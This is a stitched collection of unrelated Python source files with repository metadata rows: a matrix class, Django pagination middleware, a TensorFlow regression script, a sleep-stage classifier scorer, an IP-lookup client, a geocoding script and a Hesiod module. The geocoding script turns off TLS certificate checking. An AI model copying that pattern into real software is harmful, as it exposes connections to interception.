return self._matrix_op(M, lambda x,y: y-x)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __mul__(self, M):
npm = npmath.safe_npm(M)
return select_type(self.mtx * npm)
def __rmul__(self, M):
npm = npmath.safe_npm(M)
return select_type(npm * self.mtx)
def __truediv__(self, M):
npm = npmath.safe_npm(M)
return select_type(self.mtx / npm)
def __rtruediv__(self, M):
npm = npmath.safe_npm(M)
return select_type(npm / self.mtx)
def __matmul__(self, M):
if isinstance(M, int): return nkron(self, M)
return kron(self, M)
def __eq__(self, M):
if isinstance(M, (vector, matrix, np.matrix)):
return npmath.np_equal(self.npm(), M.npm())
else:
return False
def __invert__(self):
return matrix(self.mtx.H)
def transpose(self):
"Transform this matrix into its transpose"
self.mtx = self.mtx.T
def conj(self):
"Transform this matrix into its conjugate transpose"
self.mtx = self.mtx.H
def __getattr__(self, name):
if name in 'tT': return matrix(self.mtx.T)
elif name in 'hH': return ~self
elif name == 'shape': return self.mtx.shape
raise AttributeError("'matrix' object has no attribute '"+name+"'")
def __hash__(self):
return hash(str(self.mtx)) #fast hash
def __str__(self):
return str(self.mtx)
def __repr__(self):
return str(self)
@staticmethod
def Id(n):
"Return an `n X n` identity matrix"
return matrix(np.identity(n), no_cpy=True)
@staticmethod
def filled(shape, val=0):
"""Creates a matrix `shape[0] X shape[1]` filled with the value in `val`
NB: if shape is a natural number, the matrix will be a square matrix `shape X shape`"""
if isinstance(shape, int): shape = (shape, shape)
if val == 0:
return matrix(np.zeros(shape, complex), no_cpy=True)
elif val == 1:
return matrix(np.ones(shape, complex), no_cpy=True)
else:
M = matrix(np.empty(shape, complex), no_cpy=True)
for i in range(M.shape[0]):
for j in range(M.shape[0]):
M[i,j] = val
return M
@staticmethod
def random(shape):
"Return a random complex matrix according to the given shape"
if isinstance(shape, int): shape = (shape, shape)
rsign = lambda: sample((1,-1), 1)[0]
return matrix([[complex(rsign()*random(), rsign()*random()) for _ in range(shape[0])] for _ in range(shape[1])])
@staticmethod
def rand_unitary(dim):
# (from scipy)
random_state = np.random
z = 1/math.sqrt(2)*(random_state.normal(size=(dim, dim)) + 1j*random_state.normal(size=(dim, dim)))
q, r = np.linalg.qr(z)
d = r.diagonal()
q *= d/abs(d)
return matrix(q, no_cpy=True)
@staticmethod
def rand_orthonormal(dim):
# (from scipy)
random_state = np.random
H = np.eye(dim)
D = np.ones((dim,))
for n in range(1, dim):
x = random_state.normal(size=(dim-n+1,))
D[n-1] = np.sign(x[0])
x[0] -= D[n-1]*np.sqrt((x*x).sum())
# Householder transformation
Hx = (np.eye(dim-n+1) - 2.*np.outer(x, x)/(x*x).sum())
mat = np.eye(dim)
mat[n-1:, n-1:] = Hx
H = np.dot(H, mat)
# Fix the last sign such that the determinant is 1
D[-1] = (-1)**(1-(dim % 2))*D.prod()
# Equivalent to np.dot(np.diag(D), H) but faster, apparently
H = (D*H.T).T
return matrix(H, no_cpy=True)
# ↑↑↑↑↑↑↑↑↑↑↑↑ matrix class ↑↑↑↑↑↑↑↑↑↑↑↑ #
| 30.187602 | 247 | 0.565685 | 2,583 | 18,505 | 4.056523 | 0.125048 | 0.006299 | 0.012025 | 0.017179 | 0.563562 | 0.479481 | 0.412006 | 0.38347 | 0.333842 | 0.304066 | 0 | 0.016294 | 0.296893 | 18,505 | 612 | 248 | 30.236928 | 0.76689 | 0.226533 | 0 | 0.343243 | 0 | 0.005405 | 0.106474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0.002703 | 0.008108 | 0.048649 | 0.440541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c7b005e76d1d272f859bd8434eb849b792f547e | 1,349 | py | Python | djfw/pagination/middleware.py | kozzztik/tulius | 81b8f6484eefdc453047f62173a08f5e6f640cd6 | [
"MIT"
] | 1 | 2020-04-21T15:09:18.000Z | 2020-04-21T15:09:18.000Z | djfw/pagination/middleware.py | kozzztik/tulius | 81b8f6484eefdc453047f62173a08f5e6f640cd6 | [
"MIT"
] | 70 | 2019-04-10T22:32:32.000Z | 2022-03-11T23:12:54.000Z | djfw/pagination/middleware.py | kozzztik/tulius | 81b8f6484eefdc453047f62173a08f5e6f640cd6 | [
"MIT"
] | 1 | 2019-04-12T14:55:39.000Z | 2019-04-12T14:55:39.000Z | import asyncio
def get_page(self):
"""
A function which will be monkeypatched onto the request to get the current
integer representing the current page.
"""
try:
if self.POST:
p = self.POST['page']
else:
p = self.GET['page']
if p == 'last':
return 'last'
return int(p)
except (KeyError, ValueError, TypeError):
return 1
def pagination_middleware(get_response):
if asyncio.iscoroutinefunction(get_response):
return AsyncPaginationMiddleware(get_response)
return PaginationMiddleware(get_response)
class PaginationMiddleware:
"""
Inserts a variable representing the current page onto the request object if
it exists in either **GET** or **POST** portions of the request.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
request.page = get_page(request)
return self.get_response(request)
class AsyncPaginationMiddleware:
_is_coroutine = asyncio.coroutines._is_coroutine
def __init__(self, get_response):
self.get_response = get_response
async def __call__(self, request):
request.page = get_page(request)
return await self.get_response(request)
pagination_middleware.async_capable = True
| 25.942308 | 79 | 0.673091 | 157 | 1,349 | 5.541401 | 0.369427 | 0.151724 | 0.103448 | 0.05977 | 0.222989 | 0.222989 | 0.222989 | 0.222989 | 0.222989 | 0.222989 | 0 | 0.000985 | 0.247591 | 1,349 | 51 | 80 | 26.45098 | 0.856158 | 0.188288 | 0 | 0.2 | 0 | 0 | 0.015152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.033333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
5c7dd017cb985d2be70863e2a6c94eef99b97a29 | 11,416 | py | Python | eteach/com/pybsoft/eteach/regression/mvlinear.py | juanmr82/e-teach | 710bc119ece349c08f0228c274922d3479bec452 | [
"Apache-2.0"
] | null | null | null | eteach/com/pybsoft/eteach/regression/mvlinear.py | juanmr82/e-teach | 710bc119ece349c08f0228c274922d3479bec452 | [
"Apache-2.0"
] | null | null | null | eteach/com/pybsoft/eteach/regression/mvlinear.py | juanmr82/e-teach | 710bc119ece349c08f0228c274922d3479bec452 | [
"Apache-2.0"
] | null | null | null | '''
Created on Aug 10, 2018
@author: Juan Reina
@contact: juanmr82@gmail.com
This module uses tensorflow on a dataset to implement a multivarian linear regression.
The following input arguments are needed and for practical purposes, in CSV format
and only float values
1. File name. Must be specified with -i
2. Column number to be used as Output. It must specified with -y
3. Learning rate. It must be specified with -a
4. Nr of training epochs, specified with -t
5. If file contains header with -H
In this version, the script doesnt do model validation or data plotting,
it is simply a demonstration of Tensorflow to quickly iterate through a
CSV file, the use of the Data APU and iterators
'''
from com.pybsoft.eteach.regression import *
import getopt
import sys
import pandas as pd
def get_arguments(argv):
    '''
    Parse the command line options into a key map.

    @param argv: the argument list (typically sys.argv[1:])
    @return: Key Map containing the user arguments
    '''
    argumentMap = {}
    try:
        ops, args = getopt.getopt(argv, "hHei:y:a:t:", [])
    except getopt.GetoptError:
        print("Error in arguments")
        print("mvlinear.py -i <PAHT to INPUT FILE> -y <Answer/Output Column number> -a <learning rate>")
        sys.exit(2)
    if (ops.__len__() == 0):
        print("No arguments were specified. Please use the sctipt like this:")
        print("mvlinear.py -i <PAHT to INPUT FILE> -y <Answer/Output Column number> -a <learning rate>")
        sys.exit(2)
    for op, arg in ops:
        if (op == "-h"):
            print("\n"
                  "Usage:\n"
                  "mvlinear.py -i <PAHT to INPUT FILE> -y <Answer/Output Column number> -a <learning rate>\n"
                  "-i File Name with input data.\n"
                  "-y Within the file, which column has the output/result for the regression\n"
                  "-a Learning rate. Must be a real value\n"
                  "\n")
            sys.exit()
        # BUG FIX: the header flag is the uppercase -H option; this branch
        # previously compared against "-h" a second time, so -H was silently
        # ignored and "header" always defaulted to False.
        if (op == "-H"):
            argumentMap["header"] = True
        if (op == "-i"):
            argumentMap["file_path"] = arg
        if (op == "-t"):
            try:
                argumentMap["epochs"] = int(arg)
                if (argumentMap["epochs"] < 1):
                    print("Error. Nr of epochs must be a natural number greater than zero")
                    print("Finishing script")
                    sys.exit(2)
            except ValueError:
                print("Error. Nr of epochs must be a natural number greater than zero")
                print("Finishing script")
                sys.exit(2)
        if (op == "-y"):
            try:
                y = int(arg)
                if (y <= 0):
                    print("Output column index/number cant be less than zero")
                    sys.exit(2)
                argumentMap["y_col_nr"] = y
            except ValueError:
                print("Error. Output column index/number must be integer!!!!")
                print("Finishing script")
                sys.exit(2)
        if (op == "-a"):
            try:
                argumentMap["alpha"] = float(arg)
            except ValueError:
                print("Error. Output column index/number must be integer/float!!!!")
                print("Finishing script")
                sys.exit(2)
    # Check if the arguments are correct.
    # BUG FIX: the script previously printed the error message but kept on
    # running, which caused a KeyError later in main(); now it exits as the
    # "Finishing script" message announces.
    if (argumentMap.get("file_path", None) is None):
        print("Error. File Path was not specified")
        print("Finishing script")
        sys.exit(2)
    if (argumentMap.get("y_col_nr", None) is None):
        print("Error. Output/Answer Column number was not specified")
        print("Finishing script")
        sys.exit(2)
    if (argumentMap.get("alpha", None) is None):
        print("Error. Learning rate was not specified")
        print("Finishing script")
        sys.exit(2)
    if (argumentMap.get("header", None) is None):
        argumentMap["header"] = False
    return argumentMap
def pack_features(features, labels):
    '''
    Pack a dictionary of per-column feature tensors into one stacked tensor.

    Based on the function of the same name in the "Custom training:
    walkthrough" section of the TensorFlow website.

    @return: (features, labels) where features is a single rank-2 tensor
             (one column per original dictionary entry) instead of a
             dictionary of tensors
    '''
    # Cast every feature column to float32 before stacking (addition to the
    # original TensorFlow example).
    for name in features:
        features[name] = tf.cast(features[name], dtype=tf.float32, name=name)
    packed = tf.stack(list(features.values()), axis=1)
    return packed, labels
def main(argv):
    '''
    Entry point: parse the arguments, summarise the CSV input file, then
    build and train a multivariate linear regression with gradient descent.

    @param argv: command line arguments (sys.argv[1:])
    '''
    # Get the arguments from the console and return a key-mmap
    arguments = get_arguments(argv)
    # Ath this point the arguments syntaxt is correct. The script doesnt know yet if the
    # file does actually exists, has the correct number of columns and the correct format
    # Following assumptions are done:
    # 1. The first row contains the column names
    # 2. It is CSV Format
    # 3. All data are integer/float
    print("STARTING SCRIPT")
    print("")
    print("Analyzing the input data file at ",arguments["file_path"])
    data_file=None
    nr_rows,nr_columns = (0,0)
    mean_values,max_values,min_values=(None,None,None)
    # NOTE(review): bare except below hides the real pandas error; the script
    # exits either way, but narrowing it would aid debugging.
    try:
        data_file = pd.read_csv(arguments["file_path"],sep='\s+|\t+|,|;',engine='python',header=None)
        #Get the number of files and columns, and the min, max and mean of each separated column
        nr_rows,nr_columns =data_file.shape
        mean_values = data_file.iloc[:,:].mean()
        max_values = data_file.iloc[:,:].max()
        min_values = data_file.iloc[:,:].min()
    except:
        print("Error reading file ",arguments["file_path"], "for processing")
        print("FINISHING SCRIPT")
        sys.exit(2)
    #Displaying the data in a user friendly way
    print("Summary of data:" )
    print("File header: ",arguments["header"])
    print("Nr Rows: %d and Nr Columns: %d" % (nr_rows,nr_columns))
    print("Mean value per column:",[mean_values[i] for i in range(nr_columns)])
    print("Max value per column:", [max_values[i] for i in range(nr_columns)])
    print("Min value per column:",[min_values[i] for i in range(nr_columns)])
    print("")
    print("Defining the data import strategy, the model and its optimizer")
    #Inner FUnctions for the normalization of the data
    def normalize_data(features, labels):
        '''
        Mapping function to define feature normalization
        (min-max scaling of every column, using the statistics computed
        above from the whole file; the label column uses the last column's
        statistics).
        '''
        i = 0
        for k,v in features.items():
            features[k] = (features[k]-mean_values[i])/(max_values[i]-min_values[i])
            i = i+1
        labels = (labels-mean_values[nr_columns-1])/(max_values[nr_columns-1]-min_values[nr_columns-1])
        return features, labels
    '''
    End of Function
    '''
    '''
    @todo: Improve this very lazy Dataset batch size selection strategy or let the user to choose its own batch size
    '''
    # NOTE(review): if nr_rows <= 1 no branch assigns `batch`, causing a
    # NameError below -- confirm whether that input is possible.
    if(nr_rows>1000):
        batch= 320
    elif(nr_rows >100):
        batch = 32
    elif(nr_rows>1):
        batch = 1
    #Preparing Dataset Carachteristics
    label_name = "Y"
    col_names = ["Col%d"%(i) for i in range(nr_columns)]
    col_names[nr_columns-1] = label_name
    # NOTE(review): features_names is currently unused.
    features_names = col_names[:-1]
    '''
    @todo: Improve the delimiter selection. Probably a regex
    '''
    #Creating Dataset from CSV File and adding pre-processing info
    dataset = tf.contrib.data.make_csv_dataset(arguments["file_path"],
                                               batch_size=batch,
                                               shuffle=False,
                                               num_epochs=1,
                                               column_names=col_names,
                                               label_name=label_name,
                                               header=arguments["header"],
                                               field_delim='\t')
    #dataset = dataset.batch(batch,drop_remainder=True)
    dataset = dataset.map(normalize_data)
    dataset = dataset.map(pack_features)
    '''
    In this part of the code, the Model, the iterator through the file and the optimizer are defined
    '''
    #Creating iterator though the data
    #Initializable allow us to re-initialize this iterator after each epoch
    iterator = dataset.make_initializable_iterator()
    X,Y = iterator.get_next()
    # NOTE(review): `nmp` must come from the regression package's star
    # import -- presumably numpy; confirm.
    W = tf.Variable([[nmp.random.rand() for i in range(nr_columns-1)]],dtype=tf.float32,name="WeightMatrix")
    b = tf.Variable(tf.zeros([1]),dtype=tf.float32,name="bias")
    #The model
    hypothesis = tf.matmul(W, X, transpose_b=True) + b
    #Necessary to allow the difference of matrixes when batch > 1
    Y = tf.transpose(Y)
    #Cost/loss function
    cost_function = tf.reduce_sum(tf.squared_difference(Y,hypothesis))/(2*nr_rows)
    #Optimizer function with learning rate
    grad_descent = tf.train.GradientDescentOptimizer(arguments["alpha"]).minimize(cost_function)
    #Initializer
    init_vars = tf.global_variables_initializer()
    '''
    The definition of the Model and nodes is over. Now comes the session definition
    '''
    print("Starting training session")
    with tf.Session() as sess:
        print("Initializationg variables")
        sess.run(init_vars)
        print("Initial values of linear model:")
        print("W:",sess.run(W))
        print("b:",sess.run(b))
        print("Running the model with ",arguments["epochs"], "epochs")
        i = 0
        j=0
        cost = 0
        '''
        Although the number of epochs steps can be defined in the dataset definition,
        I left it there as 1:
        The reason for this is that this gives me the possibility to signal the end of
        the iteration of the file with a tf.errors.OutOfRangeError exception and store/show
        the cost/loss value for plotting or to store it on a CSV output file
        '''
        for i in range(arguments["epochs"]):
            #Start/Re-start iterator
            sess.run(iterator.initializer)
            while True:
                try:
                    _,cost,ys,yt=sess.run([grad_descent,cost_function,Y,hypothesis])
                except tf.errors.OutOfRangeError:
                    #suma = suma/(2*nr_rows)
                    # Log the loss every 50 epochs only.
                    if(i%50 ==0):
                        print("Epoch ",i,"ended with loss/cost value of ",cost )
                    break
            i=i+1
        print("")
        print("Fininshing with cost/loss value of", cost)
        print("Final values of linear model:")
        print("W:",sess.run(W))
        print("b:",sess.run(b))
        sess.close()
    print("FINISHING SCRIPT")
    '''
    @todo: Model validation
    @todo: Plotting of cost function values
    @todo: Exporting training session statistics into a CSV file or serialize it as a JSON Object
    '''
# EXECUTION STARTS HERE
# Standard entry-point guard: only run when executed as a script.
if __name__ == "__main__":
    main(sys.argv[1:])
| 37.676568 | 122 | 0.567537 | 1,423 | 11,416 | 4.481377 | 0.260014 | 0.018347 | 0.028226 | 0.01035 | 0.178767 | 0.1634 | 0.151482 | 0.148189 | 0.133448 | 0.094402 | 0 | 0.009728 | 0.333655 | 11,416 | 302 | 123 | 37.801325 | 0.828579 | 0.190872 | 0 | 0.278107 | 0 | 0.017751 | 0.223974 | 0 | 0 | 0 | 0 | 0.016556 | 0 | 1 | 0.023669 | false | 0 | 0.029586 | 0 | 0.071006 | 0.272189 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c7eab84cedcd9a684eaec97ef3ab71e3134b344 | 287 | py | Python | Kattis/joinstrings.py | MilladMuhammadi/Competitive-Programming | 9f84a2d2734a5efe0e1fde0062e51782cd5af2c6 | [
"MIT"
] | null | null | null | Kattis/joinstrings.py | MilladMuhammadi/Competitive-Programming | 9f84a2d2734a5efe0e1fde0062e51782cd5af2c6 | [
"MIT"
] | null | null | null | Kattis/joinstrings.py | MilladMuhammadi/Competitive-Programming | 9f84a2d2734a5efe0e1fde0062e51782cd5af2c6 | [
"MIT"
] | null | null | null | li = []
nli = []
n = int(input())
# Read the n strings; nli[i] starts as the singleton chain [i]
# (`li` is initialised just above this block).
for i in range(n):
    li.append(input())
    nli.append([i])
a=0
#print(nli)
# Each of the n-1 join operations "a b" appends chain b onto chain a
# (input is 1-based, the lists are 0-based).
for i in range(n-1):
    a,b = map(int,input().split())
    a-=1
    b-=1
    nli[a]+=nli[b]
    nli[b] = []
res = ""
# NOTE(review): this relies on `a` still naming the chain that received the
# last join, i.e. the chain holding all n indices after the joins; `res` is
# never used -- confirm both are intended.
for i in range(n):
    print(li[nli[a][i]],sep='',end='')
5c7fadc6def96acb36e9f974704042ce02aa463a | 2,356 | py | Python | Sleep_stage_classifier/score_newpatient.py | bdh-team-12/sleep-predictions-through-deep-learning | 7664cdffc0a0b0e732bffc95fd01e3ea27687025 | [
"MIT"
] | 7 | 2019-02-23T17:57:25.000Z | 2021-03-19T13:32:28.000Z | Sleep_stage_classifier/score_newpatient.py | bdh-team-12/sleep-predictions-through-deep-learning | 7664cdffc0a0b0e732bffc95fd01e3ea27687025 | [
"MIT"
] | 7 | 2019-03-02T16:55:57.000Z | 2019-04-27T20:11:12.000Z | Sleep_stage_classifier/score_newpatient.py | bdh-team-12/sleep-predictions-through-deep-learning | 7664cdffc0a0b0e732bffc95fd01e3ea27687025 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Apr 21 23:01:59 2019
@author: CRNZ
"""
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 21 21:24:21 2019
@author: CRNZ
"""
import numpy as np
import pandas as pd
import scipy.signal as ssignal
import os
import matplotlib.pyplot as plt
"""this is from Blake's code"""
import sys
sys.path.append("..")
import shhs.polysomnography.polysomnography_reader as pr
import mne
from mne.datasets.sleep_physionet.age import fetch_data
from mne.time_frequency import psd_array_welch
from utils import *
from sklearn.preprocessing import FunctionTransformer
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import *
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import pickle
def preparedata(filename):
    """
    Build the scoring feature matrix for one raw EDF recording.

    Epochs the recording in fixed windows of 3750 samples, labels every
    epoch as 'Sleep stage W', extracts EEG power-band features and adds
    the previous/next-epoch context columns.
    """
    raw = mne.io.read_raw_edf(filename)
    # One epoch per 3750 samples -- presumably 30 s windows; confirm the
    # recording's sampling rate.
    n_epochs = int(len(raw) / 3750)
    zeros = np.zeros(n_epochs)
    ones = zeros + 1
    onsets = np.linspace(0, n_epochs * 3750, n_epochs, endpoint=False, dtype=int)
    # MNE-style events array: (sample, 0, event_code) rows.
    events = np.vstack((onsets, zeros, ones)).T.astype(int)
    event_id = {'Sleep stage W': 1}
    epochs = pr.sleep_stage_epochs(raw=raw, events=events, event_id=event_id).load_data()
    features = eeg_power_band_shhs(epochs)
    return add_pre_post(features)
'''read data'''
# Hard-coded, machine-specific path of the EDF recording to score.
filename = 'D:/Documents/GaTech/CSE 6250 Big data for Health/Term project/Ruby for download/shhs/polysomnography/edfs/shhs1/shhs1-200006.edf'
PATH_TRAIN_FILE = "./output"
PATH_MODEL = "./model/"
Score_output="./score_result"
os.makedirs(Score_output, exist_ok=True)
# The training features are only loaded so the scaler below can be fitted
# on the same distribution that the model was trained with.
X_train=np.load(os.path.join(PATH_TRAIN_FILE, 'X_train.npy'))
X_score=preparedata(filename)
'''standardize based on X_train'''
scaler=StandardScaler()
scaler.fit(X_train)
X_score=scaler.transform(X_score)
# Round-trip through disk to keep a copy of the standardized features.
np.save(os.path.join(PATH_TRAIN_FILE, 'X_score.npy'), X_score)
X_score=np.load(os.path.join(PATH_TRAIN_FILE, 'X_score.npy'))
save_file = 'RFC.sav'
# SECURITY NOTE(review): pickle.load executes arbitrary code from the model
# file -- only load models from a trusted source.
RFC = pickle.load(open(os.path.join(PATH_MODEL, save_file), 'rb'))
YP_test=RFC.predict(X_score)
score_result = 'score.csv'
output_file = open(os.path.join(Score_output, score_result), 'w')
output_file.write("stages\n")
# One predicted sleep stage per epoch.
for y in YP_test:
    output_file.write("{}\n".format(y))
output_file.close() | 28.385542 | 142 | 0.720289 | 365 | 2,356 | 4.476712 | 0.424658 | 0.029376 | 0.0306 | 0.058752 | 0.094247 | 0.094247 | 0.094247 | 0.094247 | 0.0612 | 0 | 0 | 0.025628 | 0.155348 | 2,356 | 83 | 143 | 28.385542 | 0.795477 | 0.040323 | 0 | 0 | 0 | 0.018868 | 0.116576 | 0.039351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018868 | false | 0 | 0.358491 | 0 | 0.396226 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c8f7ac03387dbc75bca001d6ea7901ce4e37956 | 2,705 | py | Python | ipregistry/request.py | sebspion/ipregistry-python | 5d71e3fcf785a5be99d004ef96ced976c57dd60a | [
"Apache-2.0"
] | 7 | 2019-07-28T08:29:54.000Z | 2021-08-06T10:42:31.000Z | ipregistry/request.py | sebspion/ipregistry-python | 5d71e3fcf785a5be99d004ef96ced976c57dd60a | [
"Apache-2.0"
] | 15 | 2020-07-05T15:22:58.000Z | 2022-01-10T17:01:20.000Z | ipregistry/request.py | sebspion/ipregistry-python | 5d71e3fcf785a5be99d004ef96ced976c57dd60a | [
"Apache-2.0"
] | 3 | 2020-01-06T13:43:41.000Z | 2020-09-25T11:59:04.000Z | """
Copyright 2019 Ipregistry (https://ipregistry.co).
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import abc
import json
import requests
import six
import sys
from six.moves.urllib.parse import quote
from .__init__ import __version__
from .model import ApiError, ClientError, IpInfo
@six.add_metaclass(abc.ABCMeta)
class IpregistryRequestHandler:
    """Abstract base for Ipregistry API request handlers.

    Concrete subclasses implement the three lookup operations; this base
    class only stores the configuration and knows how to build lookup URLs.
    """
    def __init__(self, config):
        self._config = config
    @abc.abstractmethod
    def batchLookup(self, ips, options):
        pass
    @abc.abstractmethod
    def originLookup(self, options):
        pass
    @abc.abstractmethod
    def singleLookup(self, ip, options):
        pass
    def _buildApiUrl(self, ip, options):
        # Start from <apiUrl>/<ip>?key=<apiKey> and append every option as
        # an extra query parameter.
        base = "%s/%s?key=%s" % (self._config.apiUrl, ip, self._config.apiKey)
        pieces = [base]
        for name, value in options.items():
            if isinstance(value, bool):
                # The API expects the literal strings 'true'/'false'.
                value = 'true' if value else 'false'
            pieces.append("&" + name + "=" + quote(value))
        return "".join(pieces)
class DefaultRequestHandler(IpregistryRequestHandler):
    """Request handler backed by the blocking 'requests' HTTP client."""
    def batchLookup(self, ips, options):
        # POST the list of IPs as a JSON body; HTTP errors surface as
        # ApiError (with the server's JSON payload), everything else as
        # ClientError.
        try:
            r = requests.post(self._buildApiUrl('', options), data=json.dumps(ips), headers=self._headers(), timeout=self._config.timeout)
            r.raise_for_status()
            # NOTE(review): LookupError here is Python's builtin exception
            # class, not a model type -- confirm this wrapping of per-IP
            # error entries is intended.
            return list(map(lambda data: LookupError(data) if 'code' in data else IpInfo(data), r.json()['results']))
        except requests.HTTPError:
            raise ApiError(r.json())
        except Exception as e:
            raise ClientError(e)
    def originLookup(self, options):
        # Looking up the empty IP resolves the caller's own address.
        return self.singleLookup('', options)
    def singleLookup(self, ip, options):
        try:
            r = requests.get(self._buildApiUrl(ip, options), headers=self._headers(), timeout=self._config.timeout)
            r.raise_for_status()
            return IpInfo(r.json())
        except requests.HTTPError:
            raise ApiError(r.json())
        except Exception as e:
            raise ClientError(e)
    def _headers(self):
        # Identify the client library (major Python version + package version).
        return {
            "content-type": "application/json",
            "user-agent": "Ipregistry/Python" + str(sys.version_info[0]) + "/" + __version__
| 31.823529 | 138 | 0.648799 | 323 | 2,705 | 5.331269 | 0.424149 | 0.034843 | 0.034843 | 0.018583 | 0.260163 | 0.164925 | 0.164925 | 0.164925 | 0.164925 | 0.164925 | 0 | 0.004442 | 0.251017 | 2,705 | 84 | 139 | 32.202381 | 0.845508 | 0.212569 | 0 | 0.444444 | 0 | 0 | 0.040346 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.055556 | 0.148148 | 0.037037 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5ca55240c2125f62a6b90ba9a21b1bb79de7d0a8 | 605 | py | Python | reverse_api_call.py | ericpanyc/INFO550_Project | 92b91537e94dc859931eef3f5f7b29795dcbb87c | [
"MIT"
] | null | null | null | reverse_api_call.py | ericpanyc/INFO550_Project | 92b91537e94dc859931eef3f5f7b29795dcbb87c | [
"MIT"
] | null | null | null | reverse_api_call.py | ericpanyc/INFO550_Project | 92b91537e94dc859931eef3f5f7b29795dcbb87c | [
"MIT"
] | null | null | null | import requests
import xml.etree.ElementTree as ET
import urllib.request, urllib.parse, urllib.error
import json
import ssl
import sys
import re
import getopt
# SSL context that skips certificate verification (NOTE: insecure; kept for
# environments without a usable CA bundle).
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# BUG FIX: the coordinates were assigned to the wrong variables. 37.7812808
# is a latitude (San Francisco) and -122.4152363 its longitude (a latitude
# can never be -122), so the reverse lookup previously queried a point with
# lat/lon inverted.
lat = str(37.7812808)
lon = str(-122.4152363)
# Fill the placeholders in the Nominatim reverse-geocoding URL.
url = "https://nominatim.openstreetmap.org/reverse?format=geojson&lat=lat_hold&lon=lon_hold"
url = url.replace("lat_hold", lat)
url = url.replace("lon_hold", lon)
uh = urllib.request.urlopen(url, context=ctx)
data = uh.read()
js = json.loads(data)
| 23.269231 | 92 | 0.757025 | 97 | 605 | 4.618557 | 0.587629 | 0.058036 | 0.058036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037313 | 0.11405 | 605 | 25 | 93 | 24.2 | 0.798507 | 0 | 0 | 0 | 0 | 0.05 | 0.165289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5cb3d1baec8827e58e067298c08cef15ddaef136 | 3,903 | py | Python | hesiod.py | ebroder/python-hesiod | 2b11f727fe934efe8935ac3543fe538d14b8fafe | [
"MIT"
] | 3 | 2015-11-23T10:57:33.000Z | 2017-01-12T19:38:11.000Z | hesiod.py | ebroder/python-hesiod | 2b11f727fe934efe8935ac3543fe538d14b8fafe | [
"MIT"
] | 1 | 2019-12-12T18:38:26.000Z | 2019-12-13T01:28:26.000Z | hesiod.py | ebroder/python-hesiod | 2b11f727fe934efe8935ac3543fe538d14b8fafe | [
"MIT"
] | 1 | 2019-12-10T00:50:36.000Z | 2019-12-10T00:50:36.000Z | """
Present both functional and object-oriented interfaces for executing
lookups in Hesiod, Project Athena's service name resolution protocol.
"""
from _hesiod import bind, resolve
from pwd import struct_passwd
from grp import struct_group
class HesiodParseError(Exception):
    """Raised when a Hesiod record cannot be parsed into the expected format."""
    pass
class Lookup(object):
    """
    A generic Hesiod lookup.

    Resolves *hes_name* of type *hes_type* and stores the raw records in
    ``self.results``; subclasses override parseRecords() to interpret them.
    """
    def __init__(self, hes_name, hes_type):
        records = resolve(hes_name, hes_type)
        self.results = records
        self.parseRecords()
    def parseRecords(self):
        # Base implementation: the raw records need no interpretation.
        pass
class FilsysLookup(Lookup):
    """
    A Hesiod 'filsys' lookup: parses filesystem records into ``self.filsys``,
    a list of dicts sorted by priority.
    """
    # Positional field names following the record's type token.
    _FIELDS = {
        'AFS': ('location', 'mode', 'mountpoint'),
